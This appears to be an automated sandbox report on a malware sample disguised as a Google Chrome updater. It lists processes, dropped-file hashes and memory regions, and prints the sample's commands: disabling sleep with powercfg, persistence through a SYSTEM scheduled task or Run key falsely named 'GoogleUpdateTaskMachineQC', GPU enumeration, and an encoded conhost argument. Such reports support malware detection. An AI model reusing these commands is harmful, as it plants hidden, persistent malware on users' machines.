C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe hcrjlvsp2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe dmxihflldgatbxwx GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1gdioqe8NBSKYuPqRQikB1LSNDCZ707F9ASg+mgAaJFy2⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD58ae770bdb0a2d1babcc9642c82fd92a3
SHA12032658e2249a90f703dedffad238e9cb61c1278
SHA2561626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4
SHA51226317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD58ae770bdb0a2d1babcc9642c82fd92a3
SHA12032658e2249a90f703dedffad238e9cb61c1278
SHA2561626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4
SHA51226317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50d28e0c9fe4439db985e3a7e3c6055d7
SHA1484c5ab56151138115cb5cedc1f2a7e4543ecf30
SHA256c80a22a06ec7f853a86f59eed3626b842465e153ec80c893e3414a4aed26c3a4
SHA5125b4576a36aad30c0311d270f102ff91ac9253d042e96a81d19128bdea249f68fb571492bcd9323f072d193625a9b95824204d9e7342690f47f718aea14e8f562
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5378c0e9791f7cd9fc31f4aafe0cbba64
SHA112d145ab7a76ca1c1eb6a997dcc90616fdb56708
SHA2566c90aa0a25ceee18fad16805237847f1d9c5d4f4e7e4d86c03461d3c0037764b
SHA512a6ace91e18ea9bc3141b35e173118b2560844bb57799f9ee4cffef2b493d384e8030e94162fe67e3ba4940150e15c95d710bc22ceacc2bc4adf71389e2818a58
-
memory/380-222-0x0000000000000000-mapping.dmp
-
memory/448-161-0x0000000000000000-mapping.dmp
-
memory/508-210-0x0000000000000000-mapping.dmp
-
memory/536-205-0x0000000000000000-mapping.dmp
-
memory/816-159-0x0000000000000000-mapping.dmp
-
memory/920-156-0x0000000000000000-mapping.dmp
-
memory/1172-165-0x00007FFC2CE10000-0x00007FFC2D8D1000-memory.dmpFilesize
10.8MB
-
memory/1172-160-0x00007FFC2CE10000-0x00007FFC2D8D1000-memory.dmpFilesize
10.8MB
-
memory/1172-147-0x0000000000000000-mapping.dmp
-
memory/1332-166-0x0000000000000000-mapping.dmp
-
memory/1332-170-0x00007FFC2CF30000-0x00007FFC2D9F1000-memory.dmpFilesize
10.8MB
-
memory/1332-174-0x00007FFC2CF30000-0x00007FFC2D9F1000-memory.dmpFilesize
10.8MB
-
memory/1548-171-0x0000000000000000-mapping.dmp
-
memory/2124-193-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmpFilesize
10.8MB
-
memory/2124-183-0x0000000000000000-mapping.dmp
-
memory/2124-188-0x00000240B5290000-0x00000240B529A000-memory.dmpFilesize
40KB
-
memory/2124-187-0x00000240B52B0000-0x00000240B52CC000-memory.dmpFilesize
112KB
-
memory/2124-189-0x00000240B52F0000-0x00000240B530A000-memory.dmpFilesize
104KB
-
memory/2124-184-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmpFilesize
10.8MB
-
memory/2124-190-0x00000240B52A0000-0x00000240B52A8000-memory.dmpFilesize
32KB
-
memory/2124-186-0x00000240B5280000-0x00000240B528A000-memory.dmpFilesize
40KB
-
memory/2124-192-0x00000240B52E0000-0x00000240B52EA000-memory.dmpFilesize
40KB
-
memory/2124-185-0x00000240B5260000-0x00000240B527C000-memory.dmpFilesize
112KB
-
memory/2124-191-0x00000240B52D0000-0x00000240B52D6000-memory.dmpFilesize
24KB
-
memory/2140-212-0x0000000000000000-mapping.dmp
-
memory/2232-204-0x0000000000000000-mapping.dmp
-
memory/2396-213-0x0000000000000000-mapping.dmp
-
memory/2464-163-0x0000000000000000-mapping.dmp
-
memory/2520-198-0x0000000000000000-mapping.dmp
-
memory/2552-154-0x0000000000000000-mapping.dmp
-
memory/2676-207-0x0000000000000000-mapping.dmp
-
memory/2732-158-0x0000000000000000-mapping.dmp
-
memory/2784-146-0x0000000000000000-mapping.dmp
-
memory/2836-214-0x0000000000000000-mapping.dmp
-
memory/2880-211-0x0000000000000000-mapping.dmp
-
memory/3152-195-0x0000000000000000-mapping.dmp
-
memory/3168-145-0x0000000000000000-mapping.dmp
-
memory/3716-142-0x0000000000000000-mapping.dmp
-
memory/3716-143-0x00000246F1DF0000-0x00000246F1E12000-memory.dmpFilesize
136KB
-
memory/3716-144-0x00007FFC2CE10000-0x00007FFC2D8D1000-memory.dmpFilesize
10.8MB
-
memory/3760-182-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmpFilesize
2.0MB
-
memory/3760-181-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3760-175-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3760-228-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmpFilesize
2.0MB
-
memory/3760-227-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3760-176-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmpFilesize
2.0MB
-
memory/3760-177-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3760-178-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3760-179-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3760-180-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3760-173-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmpFilesize
12.9MB
-
memory/3944-206-0x0000000000000000-mapping.dmp
-
memory/3980-220-0x0000000000000000-mapping.dmp
-
memory/4024-137-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-168-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmpFilesize
2.0MB
-
memory/4024-138-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-136-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-134-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-135-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmpFilesize
2.0MB
-
memory/4024-133-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-139-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-140-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-167-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmpFilesize
12.9MB
-
memory/4024-141-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmpFilesize
2.0MB
-
memory/4052-217-0x000002C5FC499000-0x000002C5FC49F000-memory.dmpFilesize
24KB
-
memory/4052-216-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmpFilesize
10.8MB
-
memory/4052-215-0x000002C5FC499000-0x000002C5FC49F000-memory.dmpFilesize
24KB
-
memory/4052-197-0x0000000000000000-mapping.dmp
-
memory/4052-202-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmpFilesize
10.8MB
-
memory/4084-209-0x0000000000000000-mapping.dmp
-
memory/4116-152-0x0000000000000000-mapping.dmp
-
memory/4200-151-0x0000000000000000-mapping.dmp
-
memory/4396-219-0x0000000000000000-mapping.dmp
-
memory/4420-208-0x0000000000000000-mapping.dmp
-
memory/4528-200-0x0000000000000000-mapping.dmp
-
memory/4552-164-0x0000000000000000-mapping.dmp
-
memory/4592-218-0x00007FF7518614E0-mapping.dmp
-
memory/4596-225-0x000002288A6D0000-0x000002288A6F0000-memory.dmpFilesize
128KB
-
memory/4596-224-0x00007FF6874025D0-mapping.dmp
-
memory/4596-226-0x00007FF686C10000-0x00007FF687404000-memory.dmpFilesize
8.0MB
-
memory/4596-229-0x00007FF686C10000-0x00007FF687404000-memory.dmpFilesize
8.0MB
-
memory/4652-149-0x0000000000000000-mapping.dmp
-
memory/4656-203-0x0000000000000000-mapping.dmp
-
memory/4716-162-0x0000000000000000-mapping.dmp
-
memory/4876-157-0x0000000000000000-mapping.dmp
-
memory/5028-150-0x0000000000000000-mapping.dmp
-
memory/5040-194-0x0000000000000000-mapping.dmp
-
memory/5076-155-0x0000000000000000-mapping.dmp